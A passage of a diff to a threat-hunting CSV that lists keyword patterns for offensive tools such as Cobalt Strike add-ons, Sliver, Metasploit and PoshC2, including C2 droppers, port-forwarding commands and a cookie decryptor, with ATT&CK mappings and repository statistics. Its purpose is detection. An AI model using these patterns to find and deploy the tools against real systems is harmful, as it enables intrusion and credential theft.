menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" @@ -14853,15 +15021,15 @@ "*PortBender.sln*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.zip*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*portfwd add ?l *-p *-r *","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Port forwarding","10","10","N/A","N/A","N/A","N/A" -"*portfwd add --bind *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*portfwd add -r *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*portfwd add --bind *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*portfwd add -r *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*portscan*","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/zs5460/portscan","1","0","N/A","N/A","1","13","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" -"*portscan.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*portscan.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*portscan_result.cna*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*portscan386 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*portscan64 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*PortScan-Alive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*portscanner.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*portscanner.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*portscanner.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*Portscan-Port*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*portScanWithService.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -14870,38 +15038,38 @@ "*portswigger.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*posh_in_mem*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*posh_stageless.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*Posh_v4_dropper_*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Posh_v4_x64_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Posh_v4_x86_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*PoshC2-*.zip*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*poshc2.server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*poshc2.service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*poshc2-ansible-main.yml*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-cookie-decryptor*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-delete *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_dropper_*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x64_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x86_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PoshC2-*.zip*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2-ansible-main.yml*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-cookie-decryptor*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - 